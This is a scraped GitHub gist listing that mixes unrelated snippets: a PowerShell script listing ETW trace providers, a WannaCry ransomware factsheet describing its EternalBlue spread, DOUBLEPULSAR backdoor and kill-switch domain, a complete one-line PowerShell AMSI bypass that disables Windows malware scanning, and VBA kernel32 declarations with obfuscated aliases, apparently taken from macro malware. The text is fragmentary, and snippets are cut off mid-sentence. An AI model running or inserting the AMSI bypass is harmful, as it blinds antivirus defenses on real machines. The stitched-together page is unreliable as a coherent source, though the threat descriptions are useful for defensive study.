It's now here, in The Programmer's Compendium. The content is the same as before, but being part of the compendium means that it's actively maintained.
Brian Reitz brianreitz
guitarrapc
/ Get-EtwTraceProvider.ps1
Last active
October 23, 2024 18:49
ETW (Event Tracing for Windows) Providers and their GUIDs for Windows 10 x64
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #Requires -RunAsAdministrator | |
| #Requires -Version 5.0 | |
| # requires Windows 10 | |
| Get-EtwTraceProvider | Select-Object SessionName, Guid | sort SessionName | |
| # as Markdown | |
| <# | |
| #Requires -RunAsAdministrator | |
| $result = Get-EtwTraceProvider | sort SessionName | |
| $result | %{"|Name|GUID|";"|----|----|";}{"|$($_.SessionName)|$($_.Guid)|"} | |
| #> |
garybernhardt
/ types.markdown
Last active
May 22, 2024 10:02
rain-1
/ Wannacrypt0r-FACTSHEET.md
Last active
November 26, 2024 12:59
— forked from Epivalent/Wannacrypt0r-FACTSHEET.md
- Virus Name: WannaCrypt, WannaCry, WanaCrypt0r, WCrypt, WCRY
- Vector: All Windows versions before Windows 10 are vulnerable if not patched for MS-17-010. It uses EternalBlue MS17-010 to propagate.
- Ransom: between $300 to $600. There is code to 'rm' (delete) files in the virus. Seems to reset if the virus crashes.
- Backdooring: The worm loops through every RDP session on a system to run the ransomware as that user. It also installs the DOUBLEPULSAR backdoor. It corrupts shadow volumes to make recovery harder. (source: malwarebytes)
- Kill switch: If the website
www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.comis up the virus exits instead of infecting the host. (source: malwarebytes). This domain has been sinkholed, stopping the spread of the worm. Will not work if proxied (source).
update: A minor variant of the viru
mattifestation
/ amsibypass.ps1
Created
July 17, 2017 22:54
Compels AmsiScanBuffer/AmsiScanString to return E_INVALIDARG
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| [Runtime.InteropServices.Marshal]::WriteInt32([Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiContext',[Reflection.BindingFlags]'NonPublic,Static').GetValue($null),0x41414141) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Private Declare Function GetCurrentProcessId Lib "kernel32" () As Long | |
| Private Declare PtrSafe Function GetCurrentProcessId Lib "kernel32" () As Long | |
| Public Declare Function Keio2 Lib "kernel32" Alias "LoadLibraryW" (ByVal lpLibFileName As String) As Long | |
| Public Declare Function VEEAAM2 Lib "kernel32" Alias "LoadLibraryW" (ByVal lpLibFileName As String) As Long | |
| Public Declare Function wspPush2 Lib "kernel32" Alias "LoadLibraryW" (ByVal lpLibFileName As String) As Long | |
| Declare Function GetLogicalDrives& Lib "kernel32" () | |
| Declare Function GetShortPathName Lib "Kernel32.dll" Alias _ | |
| Declare Function GetWindowsDirectory Lib "kernel32" Alias "GetWindowsDirectoryA" ( _ | |
| Declare Function GlobalAlloc Lib "kernel32" (ByVal wFlags As Long, ByVal dwBytes As Long) As Long | |
| Declare Function GlobalLock Lib "kernel32" (ByVal hMem As Long) As Long |